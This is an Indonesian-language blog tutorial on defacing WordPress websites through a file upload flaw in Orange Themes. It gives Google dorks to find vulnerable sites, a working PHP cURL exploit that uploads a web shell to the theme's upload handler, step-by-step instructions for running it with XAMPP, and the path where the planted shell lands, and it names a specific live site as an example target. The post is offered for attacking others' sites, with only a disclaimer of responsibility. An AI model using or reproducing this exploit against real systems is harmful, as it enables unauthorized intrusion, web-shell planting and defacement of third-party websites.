Thursday, 2 October 2014

Tutorial Deface Website Dengan Exploit Orange Themes File Upload

Tutorial Deface Dengan Exploit Orange - Kembali gue berbicara tentang deface website kali ini gue sharing deface website menggunakan exploit orange themes dari exploit-db.com dan untuk tutorial kali ini memang agak rumit dari yang lainnya seperti posting gue kemaren "cara deface site dengan tehnik com_user" semuanya mudah kalau lu sendiri sudah terbiasa makan yang namanya kode php html javascript semua ini bisa dilakukan dengan kalem dan santai tentunya dan jangan lupa siapkan kopi rokok nya buat mantengin tutorial.
Tutorial Deface Dengan Exploit Orange Themes File Upload
Sebelumnya melanjutnya ke tutorial alangkah baiknya membaca artikel ini dari awal sampai habis supaya lu gak bingung ngikutinnya nah kali ini kita akan mencari bug/celah pada website yang memiliki CMS berbasis Wordpress dan kita akan menemukan pesan error pada web yang kita injeksi nah disini gak semua web vuln jadi harus sabar bray inget gak ada yang instant. nah berbeda dengan posting gue kemaren " cara deface web dengan havij " yang mencari bug melalui fungsi sting ' kali ini berbeda oke mari simak ke tutorial berikut :


Download Dan Simpen Dulu Bahan-Bahannya

  • Shell Bejak (untuk yang belum punya shell)
  • Xammp (pilih yang sesuai sama spesifik laptop komputer lu) cara nya lihat disini
  • Google Dork
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
  • Exploit Orange Themes 
<?php

$uploadfile="gantengersshell.php";
$ch = curl_init("http://target.com/wp-content/themes/rockstar-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Nah Perlu diperhatikan http://target.com/ Nanti akan diganti dengan target website yang vuln tersebut dan gantengersshell.php silahkan ganti dengan nama shell bejak yang kamu download tadi misal "gantengersshell.php" ingat harus .php kalau belum ya ubah dulu oke next tutorial

Tutorial Deface Dengan Exploit Orange Themes File Upload



  1. Cari target pake google dork diatas contoh gue ambil inurl:"/wp-content/themes/bulteno-theme/" nah gue dapet "http://paisleygates.com/wp-content/themes/bulteno-theme/" sekarang kita tambahin url dengan "/functions/upload-handler.php" jadinya "http://paisleygates.com/wp-content/themes/bulteno-theme/functions/upload-handler.php"
  2. Sudah itu kembali ke atas lagi copy exploit orange themes paste ke notepad save ke folder directory Local Disk C:/xampp/php jangan lupa save dengan extensi .php jangan lupa ganti text document menjadi all files contoh exploit.php
    Tutorial Deface Dengan Exploit Orange Themes File Upload

  3. Sesudah itu buka shell hasil download tadi dan copy shell nya paste ke notepad save dengan extesi .php ke dalam directory Local Disk C:/xampp/php juga contoh gantengersshell.php jangan lupa ganti text document menjadi all files lalu save
    Tutorial Deface Dengan Exploit Orange Themes File Upload
  4. Kalau semua itu sudah dilakukan sekarang buka exploit nya yang di directory C:/xampp/php>exploit.php nah buka exploit.php ganti target.com menjadi taget yang kamu dapatkan dari hasil dorking diatas lalu save
    Tutorial Deface Dengan Exploit Orange Themes File Upload
  5. buka xammp nya seperti dibawah lalu klik start hanya pada appache
    Tutorial Deface Dengan Exploit Orange Themes File Upload
  6. Kalau sudah sekarang buka CMD dengan cara windows + r lalu ketik CMD lalu tekan enter lalu ketik cd\xampp/php terus ketik lagi php exploit.php enter dan jika keluar nama shellnya seperti gantengersshell.php berarti berhasil bray kalo gak keluar apa-apa cari lagi deh target lainnya
  7. untuk mengetahui letak shellnya lihat http://target.com/wpcontent/uploads/2013/11/namashelllu.php
    Tutorial Deface Dengan Exploit Orange Themes File Upload

  8. selesai selamat bekerja
Sekian Tutorial Deface Dengan Exploit Orange Themes File Upload semoga bermanfaat untuk menambah ilmu pembelajaran semata, dan gue tidak bertanggung jawab atas apa yang lu lakukan dan dosa ditanggung pengguna tutorial ini jika mendapatkan website lalu menebasnya dan jika mengalami masalah saat mengikuti tutorial diatas biasakan berkomentar dengan sopan insyaallah akan gue bales oke sekian tutorialnya wassalam

 
function hideNow(e) { if (e.target.id == 'ac-wrapper') document.getElementById('ac-wrapper').style.display = 'none'; }